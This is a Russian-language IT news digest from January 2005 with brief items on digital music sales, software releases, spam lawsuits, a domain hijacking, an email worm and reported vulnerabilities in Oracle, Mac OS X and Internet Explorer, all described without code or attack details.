Минувший год был отмечен резким ростом легальных продаж аудиофайлов через интернет, сообщает MSNBC. По данным Международной федерации производителей фонограмм (IFPI), потребители в США и Европе купили 200 миллионов записей, что в 10 раз превышает уровень 2003 года. Прибыли от продажи музыки через интернет увеличились в шесть раз, достигнув 330 миллионов долларов. По словам главы IFPI Джона Кеннеди, цифровая музыка становится обычным делом. За прошедший год число сайтов, на которых можно легально приобрести аудиофайлы увеличилось до 230 по сравнению с 50 в 2003 году. Также резкий рост демонстрирует рынок мелодий для мобильных телефонов. Только в Японии в 200 году было продано рингтонов на 100 миллионов долларов. Как сообщает газета Daily Telegraph, аналитики полагают, что к 2008 году прибыли от продаж аудиофайлов достигнут 25 процентов от всех доходов музыкальной индустрии по сравнению с 1,5 процента в настоящий момент. Между тем, пиратские MP-3 по-прежнему составляют значительную часть музыкальной продукции. Несмотря на развернутую пропагандистскую кампанию, количество незаконных закачек составило в 2004 году 870 миллионов, снизившись всего на 30 миллионов. Одну из причин резкого роста продаж цифровой музыки IFPI видит в увеличении популярности МР3-плееров. Из 50 миллионов устройств, проданных в прошлом году, только на долю плеера iPod пришлось 10 миллионов.
Lenta.Ru

19/01/2005 12:32 SIPFoundry представила открытую IP-АТС
В организации SIPFoundry разработано программное обеспечение АТС на основе протокола SIP, позволяющее превратить стандартный Linux-сервер в телефонный коммутатор. Как сообщают разработчики, система, получившая название sipX, будет распространяться на условиях открытого кода. Программная IP-АТС совместима с SIP-телефонами и медиашлюзами, способными преобразовывать VoIP в трафик TDM-сетей и наоборот. Основателем SIPFoundry является корпорация PingTel, в которой надеются, что предприятия, заинтересованные в IP-АТС с открытым кодом, будут приобретать у нее вспомогательный программный инструментарий и услуги поддержки. SIPFoundry также является автором reSIProcate, стека ПО поддержки SIP, предназначенного для использования в оборудовании систем телефонии. Кроме того, в ассоциации разрабатывается набор тестов на интероперабельность для SIP-устройств.
Nixp.Ru

19/01/2005 11:56 Думцам отрезали доступ к сайту КПРФ.ру
Как сообщает КПРФ.ру, с середины текущего дня с компьютеров в Государственной думе перестали грузиться сайты КПРФ.ру и ПРАВДА-инфо. Так уже было во время кризиса в партии на Х съезде. В принципе, сервер, с которого парламент выходит в интернет, находится в распоряжении специальных служб, и заблокировать доступ к тому или иному сетевому ресурсу — дело техники. Ранее в СМИ сообщалось, что «провайдеры в погонах» использовали свои возможности для ограничения доступа к порнографическим сайтам из думских кабинетов — избранники тоже грешны. Но, по какому-то «странному» совпадению, как раз когда КПРФ инициировала отставку правительства, «порнографические проблемы» появились и у официального сайта компартии, а также у ресурсов, связанных с ним.
"Вебпланета"

19/01/2005 11:49 Множественные уязвимости в ORACLE
На сайте Secunia сообщается о множественных уязвимостях в семействе популярной СУБД Oracle. Всего их насчитывается 23 штуки. Последствия использования этих уязвимостей различны: раскрытие важной системной информации, расширение локальных полномочий в системе, возможность внедрения кода (PL/SQL injection), возможность манипулирования (изменения) данными, возможность проведения удалённых DoS-атак. Для каждого из продуктов семейства Oracle компанией производителем выпущены патчи.
Подробное описание

19/01/2005 10:52 "Тестер" для Web-сервисов
Компанией Empirix выпущен инструментарий тестирования Web-приложений и сервисов e-Test Suite 8.0. Система снабжена Web-интерфейсом и обеспечивает возможность многопользовательского тестирования, в том числе организациями, нескольких одновременных сеансов с различной рабочей нагрузкой. Возможно тестирование .Net и Java-приложений, а также любых Web-сервисов, использующих протокол SOAP. Предусмотрены функции, облегчающие анализ причин возникновения узких мест и соответствующую подстройку тестируемых приложений. Встроенная система управления процессом тестирования обеспечивает возможность составления планов испытаний, оперативного обмена наборами тестовых данных и результатами между участниками.
"Открытые системы"

19/01/2005 10:38 В сети "Би Лайн" запущен почтовый фильтр
Оператор мобильной связи «ВымпелКом» (торговая марка «Би Лайн GSM») запустил в опытно-коммерческую эксплуатацию систему передачи почтовых сообщений с фильтрацией спама и защитой от вирусов. Система предназначена для обработки исходящей электронной почтовой корреспонденции пользователей услуг передачи данных «Мобильный GPRS-интернет» и WLAN, а также для блокировки рассылки спамерских и инфицированных компьютерными вирусами сообщений абонентами компании. Механизм фильтрации базируется на основе антиспамерской системы «Спамтест» компании «Ашманов и Партнеры». Фильтр должен обеспечить обнаружение не менее 65% спамерских писем, число ложных срабатываний не должно превышать 0,005%.
CNews

19/01/2005 09:32 Ошибки Darwin эволюционировали в Mac OS X
Проверка исходного кода операционной системы open source, из которой Apple Computer многое позаимствовала для Mac OS X, выявила в ПО Apple четыре уязвимости различной степени серьезности. Пробелы в защите кода Darwin проявляются в версии Mac OS X 10.3 с кодовым названием Panther и вызваны ошибками в ядре, утверждается в рекомендациях, опубликованных в понедельник секьюрити-фирмой ImmunitySec, обнаружившей эти ошибки. «Эта разновидность ошибок влияет главным образом на многопользовательские системы удаленного доступа, — прокомментировал основатель и консультант ImmunitySec Дэвид Эйтель, добавив, что так как Mac OS X чаще всего используется на рабочих станциях, для большинства систем эти ошибки не будут иметь важных последствий. Впервые компания обнаружила ошибки в июне и опубликовала информацию о них в закрытом списке рассылки для заказчиков, но не предупредила об этом Apple. В понедельник она обнародовала эти сведения, изложив их на семинаре. Представитель Apple подтвердил, что компании не сообщили об ошибках, и сказал, что она анализирует уязвимости, но в подробности вдаваться не стал. ImmunitySec обнаружила ошибки, исследуя общедоступный исходный код операционной системы Darwin, варианта BSD Unix. Darwin составляет ядро новой операционной системы Apple Mac OS X, так что ошибки, обнаруженные секьюрити-фирмой, влияют и на эту ОС. В число выявленных ошибок входит дефект функции SearchFS Mac OS X, несколько ошибок переполнения памяти ядра и логический дефект в команде АТ, которая используется для планирования задач операционной системой.
Подробности

19/01/2005 09:09 У старейшего нью-йоркского интернет-провайдера украли домен
У старейшего нью-йоркского коммерческого интернет-провайдера Panix (Public Access Networks Corporation, основана в 1989 году) в минувшие выходные неизвестные лица похитили принадлежащее ему доменное имя Panix.com. Как сообщает издание NewsFactor, в какой-то момент домен, легально принадлежащий Panix, оказался перерегистрирован на некую компанию в Австралии, DNS-записи для домена стали указывать на серверы некой компании из Великобритании, а записи, отвечающие за направление почты, стали указывать на еще одну компанию, на этот раз канадскую. Подобные преобразования не могли возникнуть без санкции доменного регистратора (в данном случае это компания Dotster), который был обязан оповестить Panix в случае возможных изменений. Однако ничего подобного не произошло, что говорит о злоумышленном характере акции. После того, как Panix связалсь с регистратором и остальными задействованными структурами, домен удалось вернуть, и он стал вновь указывать на сайт Panix, однако для полного восстановления нормальной работы необходимо время. В период неправильной работы домена он указывал на другой сайт, и клиенты провайдера не могли пользоваться его услугами, а почта, направленная по адресам в домене @panix.com, либо пропадала, либо попадала не по адресу, либо в руки злоумышленников.
lenta.Ru

18/01/2005 17:49 XML-"клон" формата QuarkXpress
В компании Quark разработали XML-схему, полностью описывающую формат файлов издательской системы QuarkXpress - QuarkXpress Markup Language (QXML). Схема выполнена в соответствии со спецификацией W3C DOM, которая определяет независимый от языка интерфейс, позволяющий приложениям и сценариям динамически обновлять содержимое, структуру и оформление документов. По словам представителей Quark, основное назначение QXML - упростить разработку расширений XTensions для QuarkXpress. Если раньше это делалось посредством API только на C и C++, то теперь, благодаря поддержке DOM, расширения можно будет создавать на любых языках, в том числе на таких, как Perl и AppleScipt. QXML представляет публикацию в виде XML-дерева, и любые изменения, вносимые расширением в XML-представление документа, автоматически распространяются и на файл проекта QuarkXpress. Комплект средств создания расширений с применением QXML можно получить на сайте Quark, предварительно зарегистрировавшись в качестве разработчика XTensions. Правда, в первую версию комплекта включен лишь генератор XML-представлений, а обратная процедура, преобразование XML-документа в файл QuarkXpress, пока не реализована.
"Открытые системы"

18/01/2005 15:24 Novell намеревается портировать Evolution под windows
Нат Фридман (Nat Friedman), один из основателей компании Ximian, в настоящее время работающий в Novell, сообщил в своем блоге, что компания наняла Тора Лилквиста (Tor Lillqvist) для работы над портированием Evolution под MS windows, cообщает linux.org.ru. Лилквист известен своей работой над переносом Gimp и gtk+ под windows.
Подробности

18/01/2005 14:58 ФБР может отказаться от своей антитеррористической компьютерной системы
ФБР планирует прекратить дальнейшее внедрение в своей компьютерной системе программной компоненты Virtual Case File, сообщает агенство Reuters. Использование этой технологии предполагалось в рамках запуска крупномасштабного проекта Trilogy. Согласно идее Trilogy, все агенты, задействованные в антитеррористической деятельности, получили бы оперативный доступ к информации глобальной базы данных документы, фигурирующие в ходе расследований и операций ФБР. На подготовительных этапах работы в ФБР было установлено 30000 новых компьютеров и была развернута высокоскоростная защищенная сеть. Однако третий, заключительный этап, оказался самым проблематичным и практически неосуществимым. Работа над Virtual Сase File ведется уже четвертый год и еще далека от своего завершения. ФБР потратило уже 170 млн. долларов на внедрение последней компоненты, которая позволила бы всем агентам иметь постоянный доступ к общей базе данных и оперативно узнавать о последних новостях в расследованиях и появлении новых фактов. В ФБР крайне недовольны работой системы, поскольку она не оправдала возложенных на нее надежд и была охарактеризована главой ФБР Робертом Мюллером, как "устаревшая и неадекватная".
Подробности

18/01/2005 14:10 «Московская городская телефонная сеть» выпустила справочник на компакт-диске
В продажу поступила новая CD-версия телефонного справочника "Москва-2005". Сравнительно с прошлогодними изданиями, она стала еще информативнее и удобнее для пользования. Компакт-диск "Москва-2005" содержит информацию о более чем 120 000 государственных и коммерческих организаций столицы, а также имеющих семизначную нумерацию фирмах и учреждениях Московской области. Эти данные совмещены с подробной картой города. Традиционно CD-версия содержит массу полезной информации: схему метро, телефонные коды стран и городов, план Подмосковья, карту административного деления Москвы, список переименованных улиц, телефоны экстренных служб и многое другое. В этом году ОАО МГТС впервые выпустило CD-версию справочника "Москва-2005" для корпоративных клиентов. Она позволяет искать необходимую информацию с каждого рабочего места в офисе. Розничная цена CD-версии для физических лиц - 150 руб. Купить ее можно в пункте продаж ОАО МГТС по адресу: ул. Новый Арбат, д. 2, "Сервис-центр". Тел. 290-59-15. В ближайшее время справочник появится на телефонных узлах компании, в книготорговых организациях и почтовых отделениях города.
О справочнике

18/01/2005 13:51 Выход журнала Crypto-Gram
15 января, как и положено, был выпущен первый в этом году номер электронного журнала Crypto-Gram, посвящённый вопросам безопасности и криптографии. Журнал традиционно выпускается Брюсом Шнайером, руководителем компании Counterpane Internet Security, Inc. В номере представлены следующие разделы: Fingerprinting Students, Crypto-Gram Reprints, Easy-to-Remember PINs, Shutting Down the GPS Network, News, Burglars and "Feeling Secure", Counterpane News, Hollywood Sign Security, Secure Flight Privacy/IT Working Group, Cyberwar, Comments from Readers.
Crpto-Gram

18/01/2005 12:31 Очередная уязвимость в Internet Explorer
Не успела Microsoft залатать очередные дыры в своём ПО, как появилось сообщение о существовании очередной уязвимости в браузере Internet Explorer. О ней сообщил Berend-Jan Wever. По словам автора, уязвимость позволяет определить присутствие (либо наоборот - отсуствие) локальных файлов на машине пользователя. Проблема связана с тем, что сайты из зоны безопасности "Internet" могут включать скрипты из локальных ресурсов. Это может быть использовано удалённым сайтом для определения локальных скриптов при помощи проверки глобальных переменных, представленных во включаемом скрипте. Уязвимость проверена на полнопатченной системе в Internet Explorer 6.0 и Microsoft Windows XP SP2. В качестве временной меры предосторожности рекомендуют отключить актичный скриптинг.
Описание

18/01/2005 12:17 Бета-тестирование первой системы интегрированной защиты корпоративной сети
"Лаборатория Касперского", ведущий российский разработчик систем защиты от вирусов, хакерских атак и спама, объявляет о начале бета-тестирования первого программного комплекса, предназначенного для организации системы всесторонней защиты корпоративной сети вне зависимости от ее масштаба - Kaspersky Guard@Net 5.0. Новая разработка компании базируется на технологии ASTARO Security Linux, созданной ASTARO AG, международно известным разработчиком решений в области IT-безопасности. Новый продукт позволяет создать целостную и надежную систему сетевой безопасности. Она препятствует проникновению в сеть предприятия всех современных видов электронных угроз, обеспечивает контроль над доступом пользователей к ресурсам интернета, а также позволяет объединить территориально удаленные подразделения бизнес-заказчика в надежную, защищенную сеть на базе технологии VPN. Программный комплекс Kaspersky Guard@Net 5.0 разработан для защиты корпоративного сетевого пространства, и отвечает всем требованиям современного бизнеса. Каждый из компонентов нового решения "Лаборатории Касперского" обеспечивает надежную защиту от определенного типа вредоносной либо нежелательной сетевой активности. Все элементы Kaspersky Guard@Net 5.0 объединены при помощи единого механизма управления. Он представлен унифицированными процедурами обработки запросов и команд, единым механизмом установки и конфигурации элементов системы, а также единой системой ведения статистического учета и анализа работы комплекса сетевой защиты. Антивирусная составляющая Kaspersky Guard@Net 5.0 создает непреодолимый барьер на пути вирусов в корпоративную сеть, охватывая все каналы информационного взаимодействия заказчика с внешней средой. Для этого производится антивирусная проверка трафика, поступающего в сеть по протоколам HTTP и FTP, а также входящей и исходящей электронной корреспонденции, проходящей по протоколам SMTP и POP3. При этом контролю подвергаются все элементы электронных писем, включая вложения. Уникальная технология сканирования позволяет обнаруживать вирусы в архивах более 700 наиболее распространенных форматов, что исключает возможность проникновения вредоносного кода, скрытого в массиве архивов.
Более подробно

18/01/2005 11:58 Аналитик Illuminata о конкуренции SUSE и Red Hat
По мнению Гордона Хэффа (Gordon Haff), аналитика из Illuminata, SuSE ведет себя более активно в представлении новых технологий в своих в корпоративных серверных продуктах нежели ее главный конкурент — Red Hat. В качестве доказательства он приводит ранний релиз от SuSE с Linux-ядром из новой стабильной ветки 2.6. Кроме того, важную роль сыграло приобретние компании Novell'ом. Тем не менее, и Red Hat на месте не стоит: совсем скоро выйдет новая версия корпоративного дистрибутива компании — Red Hat Enterprise Linux 4, в котором также появится Linux 2.6. Судя по циркулирующим в Linux-сообществе слухам, релиз RHEL 4 будет представлен компанией 14 февараля 2005 года на LinuxWorld в Бостоне. Однако Хэфф считает, что возникшая задержка большого вреда Red Hat не принесла: «Не похоже, чтобы Red Hat сильно пострадала от позднего выпуска дистрибутива с Linux-ядром 2.6».
Nixp.Ru

18/01/2005 11:44 Закон об ЭЦП пока только вредит
Закон об электронно-цифровой подписи (ЭЦП), принятый три года назад, так и не заработал. Более того, как отмечают участники рынка, после вступления в силу закона положение дел в данной области только ухудшилось. Хотя наступление цифрового века предвещало избавление от бумажного документооборота, этого не произошло. Как раз наоборот, количество используемой в офисах бумаги только выросло. Причина этому — в отсутствии реально работающего механизма регулирования электронно-цифровой подписи. В то же время, за внедрение ЭЦП выступают не только представители бизнеса, которым ЭЦП позволит ускорить многие процессы и отказаться от неэффективного бумажного документооборота, но и государство, поскольку ЭЦП является необходимым инструментом для осуществления взаимодействия населения и власти. Мининформсвязи разработало и вскоре представит на рассмотрение правительству Концепцию принятия поправок к Закону об ЭЦП. В частности, планируется исправить множество обнаруженных в законе опечаток и неточностей. Например, в законе содержится следующая фраза: «Владелец сертификата не может его использовать, если ранее он уже был использован». Как пояснил глава правового управления министерства Михаил Якушев, из-за того, что в этой фразе пропущено несколько слов, любое повторное использование сертификата делается попросту незаконным. Другой пример: в законе оговаривается такая мера, как приостановка действия сертификата, что на практике не может быть осуществлено. Кроме того, Мининформсвязи намерено учесть рекомендацию министерства юстиции. Дело в том, что, поскольку цифровая и бумажная подписи равноправны, Закон об ЭЦП регулирует также и использование бумажной подписи. Однако Минюст попросил ограничить действие закона только областью ЭЦП.
Более подробно

18/01/2005 10:39 Microsoft преследует злостных спамеров
Microsoft подала гражданский иск против двух американцев, владельцев целого ряда компаний, занимающихся рассылкой спама, сообщает Info World. Исковое заявление против Райана Питилака, студента Техасского университета, и Марка Троттера поступило в минувшую пятницу в федеральный суд США в Сиэтле (штат Вашингтон). Днем ранее против этих же лиц гражданский иск был подан генеральным прокурором штата Техас Грегом Эбботтом в окружной суд в Остине. Питилак и Троттер обвиняются в нарушении федерального закона США CAN-SPAM, законов штатов Вашингтон и Техас. Обвиняемые основали множество компаний, включая фирмы Leadplex, Payperaction и Eastmark Technology, которые специализируются на рассылке макулатурных сообщений. По общему количеству разосланного спама компании занимают четвертое место в мире. Питилак и Троттер обвиняются в том, что рассылаемые их компаниями письма не имели пометки о рекламном характере содержимого, что является нарушением принтого в США федерального антиспамерского закона (CAN-SPAM). Некоторые макулатурные сообщения предлагали пользователям интернета финансовые услуги, на оказание которых ответчики не имели лицензий. Кроме того, Питилак и Троттер обманным путем собирали персональные данные пользователей, обещая, что они будет надежно защищены. Из этой информации спамерами создавались базы данных и продавались другим фирмам. В своем иске Microsoft требует возмещения ущерба ответчиками, однако сумма компенсации компанией не разглашается. В случае, если вина Питилака и Троттера будет в суде доказана, им придется выплатить крупные штрафы. За нарушение закона CAN-SPAM предусматривается взыскание в размере от 250000 долларов США до 2 млн. долларов США.
"Компьюлента"

18/01/2005 09:35 Red Hat готовит к выпуску Enterprise Linux 4
Red Hat бросает вызов таким конкурентам, как Novell, подготовив новую версию своего дистрибутива Linux для предприятий. Очередную версию Red Hat Enterprise Linux планируется выпустить в феврале, и в ней, по всей вероятности, будет полная поддержка ядра Linux 2.6 и многочисленные средства защиты. Как утверждают близкие к компании источники, выпуск состоится 14 февраля и приурочен к конференции LinuxWorld в Бостоне. Red Hat уже указывала на то, что Red Hat Enterprise Linux 4 основывается на ядре 2.6. Бета-версия продукта, вышедшая в сентябре 2004 года, тоже основана на ядре Linux 2.6. Текущая версия, Enterprise Linux 3, поддерживает некоторые функции ядра 2.6, но сама основана на версии 2.4. Добавление полной поддержки нового ядра позволит операционной системе работать с файловыми системами емкостью свыше одного терабайта и улучшит производительность подсистемы ввода-вывода. Конкурирующий дистрибьютор Linux Novell уже освоил ядро 2.6 в своем продукте SuSE Linux Enterprise Server 9, который вышел в августе 2004 года. Прошлым летом Марк Кокс из Red Hat security response team говорил ZDNet UK, что в Red Hat Enterprise Linux 4 войдут также усовершенствованные средства защиты, ставшие результатом проекта Security Enhanced Linux (SELinux) Агентства национальной безопасности США. Кокс пояснил, что SELinux «полностью сегментирует программы», так что ошибка в одном приложении не может использоваться для модификации других. При этом на пользователей возлагается ответственность за создание файлов политик для каждого приложения. «Придется создавать политики и конфигурировать их, а некоторые люди не любят этого делать», — сказал Кокс.
ZDNet

18/01/2005 09:14 Найден новый вирус, призвающий жертвовать деньги пострадавшим от цунами
В интернете в понедельник компьютерной компанией Sophos была зафиксирована рассылка почтового вируса, маскирующегося под просьбу помочь жертвам цунами в Юго-Восточной Азии, передает Reuters. Вирус приходит в виде письма с заголовком "Tsunami donation! Please help!" ("пожертвования на цунами, пожалуйста помогите") и приложенным исполняемым файлом "tsunami.exe". Собственно, этот файл и содержит вирус. При активации он заражает компьютер, рассылает свои копии по всем найденным в компьютере адресам, и готовится совершить распределенную DDoS-атаку на один из немецких хакерских сайтов. Характер угрозы от нового червя пока оценивается как незначительный, и в ближайшее время все компании-производители антивирусных средств должны будут выпустить обновления, устраняющие новый вирус.
Подробности

17/01/2005 18:08 Недавно найденая уязвимость в Windows Media Player встроена по заказу ФБР
Недавно найденая уязвимость в Windows Media Player(см. новость ), по информации cnews.ru, является искусственной.
Корпорация Microsoft отказывается блокировать недавно найденную "дыру" в проигрывателе Windows Media Player, заявляя, что уязвимость эта – искусственная и изначально задумывалась для борьбы с пиратским копированием цифровых материалов. Пострадавшим же от троянцев, использующих эту лазейку, Microsoft рекомендует направлять свои претензии ФБР.
Подробнее: www.cnews.ru

17/01/2005 15:38 Мошенник наживался на любви москвичей к Интернету
Мошенника, которому больше года удавалось обманывать доверчивых москвичей, решивших обзавестись подсоединением по выделенной линии к Интернету, удалось задержать оперативникам отдела по борьбе с экономическими преступлениями УВД Восточного округа столицы. Как сообщили “МК” в правоохранительных органах, коммуникационная фирма, где верховодил жулик, заработала себе имя еще в 2002 году, на заре массового перехода жителей столицы с модемов на подключения к скоростным каналам Глобальной Паутины. Но в мае 2003 года контору возглавил новый директор, а место главного бухгалтера заняла его жена. Пользуясь былой славой, они продолжали заключать договоры на организацию подключений к Интернету, обещая провести связь в течение 15 дней. При этом предприниматели требовали полной предоплаты, составлявшей не менее 100 долларов с клиента. Иногда они даже устанавливали ретрансляторы и антенны на подключаемые дома, но затем, через месяц-полтора, снимали их и исчезали. В итоге москвичи оставались без денег и без Интернета. А мошенники переезжали в другой район, арендовали там офис, раскидывали объявления с льготными условиями на подключение к Всемирной Паутине и точно так же просто собирали деньги, а затем снова скрывались. Таким образом они “работали” более года, успев покочевать по всем округам столицы. Когда не осталось мест, где можно было бы еще обмануть людей, супруги-обманщики решили исчезнуть. Они распродали все оборудование и прочие активы фирмы и, не выплатив зарплату сотрудникам, поспешили скрыться на Украине. Оперативники сняли обоих с поезда Москва–Киев за 10 минут до его отправления с Киевского вокзала. Сейчас аферист находится в следственном изоляторе “Матросская Тишина”. На данный момент оперативникам известно о полутысяче москвичей, пострадавших от действий коммерсантов, но, предположительно, их было гораздо больше.
Подробности

17/01/2005 14:45 Недельный отчет о вирусах Panda Software
Опубликован традиционный, еженедельный отчёт о вирусной активности прошедшей недели от Panda Software. В отчете рассмотрены три уязвимости, два троянца - WmvDownloader.A и WmvDownloader.B, и два червя: Lasco.A и Gaobot.CKP.
Отчёт

17/01/2005 14:28 PostgresSQL переходит в новый класс
Компания Pervasive Software, ранее специализировавшаяся на разработке встраиваемых СУБД, анонсировала специализированную версию системы с открытым кодом PostgresSQL, позиционируемую как СУБД уровня предприятия - Pervasive Postgres. Как заявляют разработчики, продукт "лишен некоторых недостатков, свойственных MySQL". В PostgresSQL действительно имеется ряд функций корпоративного уровня, отсутствующих пока в MySQL: отображения, триггеры, хранимые процедуры и защита целостности таблиц. Кроме того, Pervasive Postgres сопровождается лицензией BSD, допускающей бесплатное использование в коммерческих целях, тогда как для аналогичного применения MySQL необходимо приобретать лицензию. В самой Pervasive рассчитывают на прибыль от услуг платной поддержки, стоимость которой в различных пакетах разнится от 100 до 5 тыс. долл. ежегодно в расчете на сервер. Специалисты компании также будут помогать заказчикам в переходе на Pervasive Postgres с СУБД Oracle, DB2, Sybase, MySQL и др. Кроме того, компания обещает создать интегрированный пакет вспомогательного ПО, начав с автоматического инсталлятора и простейших средств администрирования БД. Все эти разработки в компании собираются выпустить в открытых кодах.
"Открытые системы"

17/01/2005 13:15 Ловля спамеров на живца
Когда спамерский бот приходит на сайт и собирает урожай почтовых адресов, его заманивают на специально сгенерированную страницу с контрольным адресом электронной почты. При этом регистрируется IP, дата и время посещения. Впоследствии скрипт, который создал ловушку, будет регистрировать все письма, пришедшие на контрольный адрес. Таким образом можно выявить спамерских ботов и блокировать им доступ на сайт. После каждого визита спамерских роботов генерируется новая страница с новым уникальным адресом, и охота за спамерами продолжается. Фактически, каждому посетителю демонстрируются уникальный e-mail. Подобные ловушки расставляются на сайтах участников антиспамерского проекта Honeypot. На сайте проекта постоянно ведется статистика по спамерским ботам с указанием их IP, даты первого и последнего появления. По каждому боту доступна подробная информация. Проект начал свою работу только в ноябре 2004 г., но быстро доказал свою эффективность. Только за первую неделю было зарегистрировано более 1000 сайтов-участников. Сеть ловушек, расставленная в интернете, приносит богатый урожай IP-адресов спамерских ботов, которые выявляются безошибочно. Еще один интересный аспект — это текст лицензионного соглашения, который содержится в ловушке. Он гласит, что владелец бота, посетившего эту страницу, соглашается выплатить компенсацию за каждое отправленное письмо на почтовые ящики данного сайта, при этом каждый почтовый ящик имеет цену в $50. И, в конце концов, владелец бота соглашается приехать в местный суд, куда его вызовет владелец сайта. Для американских участников проекта это очень важно. Вот такая ловушка: не только технологическая, но еще и юридическая, сообщает webplanet.ru.
Собранная статистика
Cтраница регистрации для желающих принять участие

17/01/2005 12:58 В падении LiveJournal обвиняется Кремль?!
Очередной бред напечатан на страницах многих Интернет-изданий. Якобы к отказу ЖЖ причастен "Кремль" (непонятно, кто имелся в ввиду -то ли спецслужбы, то ли сотрудники правительства). Итак, предоставляем слово одному из них - Internet.Ru. "После того, как работа ЖЖ была восстановлена, появились разные версии случившегося. Напомним, что не так давно LiveJournal, фактически, сменил владельца. Им стала компания Six Apart, а первые "результаты" проявились очень скоро. Как бы то ни было, сейчас сервис работает в нормальном режиме, хотя некоторые пользователи до сих пор пребывают в шоковом состоянии. Между тем, как сообщает "Правда.Ру", в Сети обсуждается версия, что проблемы у "Живого журнала" могли возникнуть по инициативе Кремля. Как раз накануне разразился скандал вокруг деятельности молодежной группы "Идущие без Путина" - она заявила о себе как об альтернативной организации, объединяющей студентов, недовольных отменой льгот на проезд в транспорте и возможной ликвидацией армейских отсрочек. Через свой онлайновый дневник организация планировала организовать "Марш протеста против кремлевского произвола", который был намечен на 29 января. На днях пропал доступ к сайту "Идущих без Путина" (располагающемуся на бесплатном хостинге narod.ru), перестала работать их электронная почта. LiveJournal оставался единственным рупором организации. Есть те, кто верит в связь между "обвалом" сервиса и функционированием молодежной структуры" Cтоит заметить, что подобная информация опубликована также на сайтах Yтро.Ru, Newsru.com и Грани.Ru. А ведь достаточно просто взглянуть на информацию Livejournal.com, на котором опубликована информация об истинной причине, которая далека от политике и связана с обычными перебоями с электроэнегией (мы об этом писали вчера).
UINC.RU

17/01/2005 12:48 Sun выпустила исходный код Java 6 «Mustang»
Sun Microsystems опубликовала на своем веб-сайте исходный код новой версии Java для настольных ПК — Java 6 под кодовым названием Mustang. Выпуск версии с открытым исходным кодом связывается в Sun с надеждами привлечь к созданию приложений для Java 2 Standard Edition (J2SE) 6.0 сторонних разработчиков и показать им свою приверженность к системам open-source. Появление новой версии Java планируется к следующему году. «Большая открытость — одна из откровенных идей J2SE 6.0, посредством которой мы облегчаем сторонним разработчикам возможность узнать, что происходит в Mustang и действительно повлиять на выпуск», — сказал Грехем Гамильтон (Graham Hamilton), член команды разработчиков платформы Java из Sun. О выпуске кода сообщил Computer Weekly.
CNews

17/01/2005 11:46 НР модернизирует OpenVMS
Hewlett-Packard планирует вдохнуть новую жизнь — или, точнее, новый процессор — в свою почтенную операционную систему OpenVMS. Производитель компьютеров и принтеров выпустит версию операционной системы 8.2, которая впервые сделает OpenVMS доступной для процессоров Itanium. Анонс будет сопровождаться обновлением семейства Itanium-серверов, которое во вторник представит генеральный директор НР Карли Фьорина. Этим выпуском НР намерена вернуть исторически лояльных заказчиков, которые сегодня являются главными мишенями для таких конкурентов, как IBM и Sun Microsystems. HP уязвима потому, что заказчики ее OpenVMS оказались перед лицом крупной реорганизации аппаратуры и ПО: НР отказывается от процессора Alpha, который сегодня служит основной платформой для OpenVMS. Дебют OpenVMS 8.2 будет означать, что на одном Itanium-сервере наряду с Windows, Linux и HP-UX сможет работать четвертая операционная система. Ожидается, что НР объявит о новых ценах и о планах совместной поддержки, которая облегчит работу с такой смесью. OpenVMS для Itanium унаследовала многие возможности Alpha-версии — в частности, поддержку кластеризации.
Подробности

17/01/2005 10:49 Стартовал исследовательский проект EDOS в области разработки ПО
Ведущие европейские исследовательские институты и компании, занимающиеся разработкой ПО на основе открытого исходного кода,объявили о запуске проекта EDOS. Темой проекта являются проблемы сложности управления программным обеспечением на основе открытого исходного кода. Участники EDOS будут сотрудничать в разработке теоретических и технических решений для управления масштабными проектами модульного программного обеспечения. Европейский союз выделит на проект 2,2 млн. евро, а общий бюджет проекта EDOS составляет 3,4 млн. евро. В команду EDOS входят шесть исследовательских и академических институтов и четыре компании-разработчика ПО. Консорциум EDOS планирует разработать два приложения. Первое предназначено для процесса компоновки ПО: распределенное и состоящее из равноправных узлов приложение призвано облегчить интеграцию большого количества программных модулей, из которых состоит ОС Linux. Второе приложение EDOS предназначено для проверки качества. EDOS планирует разработать средства, которые сделают тестирование более эффективным и комплексным. Единая база, не связанная ни с одним конкретным компьютерным языком, позволит разработчикам с легкостью создавать тестовые модули для своего ПО. Проект EDOS рассчитан на 30 месяцев. Созданное в ходе проекта программное обеспечение будет распространяться по лицензии GNU/GPL, а текущие теоретические результаты будут публиковаться в научных журналах.
"Компьюлента"

17/01/2005 10:23 "Лаборатория Касперского" предлагает утилиту для лечения смартфонов
"Лабораторией Касперского" разработана и предлагается для скачивания триал-версия утилиты для поиска и удаления вредоносных программ на смартфонах и других мобильных устройств под управлением Symbian OS. Новая версия утилиты позволяет находить и удалять Lasco, Skuller и Cabir. Получить утилиту можно с wap-сайта компании. Триал-версия работоспособна до 1-го мая 2005 года. Системные требования: операционная система: Symbian OS 6.1, 7.0; поддерживаемые устройства: Series 60 smartphones. Примечание: утилита протестирована на Nokia 3650, Nokia 7650, Nokia 6600, Siemens SX1. Вы можете загрузить утилиту либо напрямую на ваш смартфон с wap-сайта, либо скопировать ее с вашего PC, предварительно загрузив ее туда (размер утилиты 9.2 KB). Она устанавливается как обычный инсталляционный файл для Symbian путем открытия сообщения о принятии вами файла. Для обновления антивирусных баз необходимо выполнить повторную загрузку утилиты (рекомендуется обновлять ее всякий раз, как только вы получили информацию о появлении новых вредоносных программ для Symbian OS).
Адрес для скачивания

17/01/2005 09:21 Microsoft обнародовала предварительную версию Avalon
В пятницу Microsoft выложила общедоступную предварительную версию Avalon, своего нового механизма обработки графики и представления информации для Windows. Первоначально Avalon был также главной опорной колонной Longhorn — следующей версии Windows. Но в прошлом году компания решила сделать его доступным и в качествен дополнения к Windows ХР и Windows Server 2003. Несмотря на то, что от Avalon во многом зависит будущее Windows, среднему пользователю компьютера никогда не придется иметь дело непосредственно с этим механизмом. Он лишь улучшает обработку графики и обещает разработчикам возможность писать более красивые приложения. В ноябре Microsoft выпустила версию Avalon community technology preview для разработчиков; теперь тот же код сделан доступным для всех. «Мы рады в ответ на многочисленные просьбы предложить ту же сборку широкой публике», — говорится на веб-сайте Microsoft. Версия preview работает на Windows XP и Windows Server 2003. Однако Microsoft предупредила разработчиков, что код текущей версии достаточно сырой. Компания рекомендует не использовать его даже на основном компьютере программиста, так как высока вероятность того, что из-за ошибок пользователю со временем придется переустанавливать операционную систему, с которой он пробовал Avalon. В ноябре Microsoft пообещала выпустить бета-версию Avalon этим летом, а окончательную версию — в 2006 году. В пятницу представитель компании отказался что-либо добавить по поводу сроков.
ZDNet

16/01/2005 13:14 Мининформсвязи разработало поправки к закону об ЭЦП
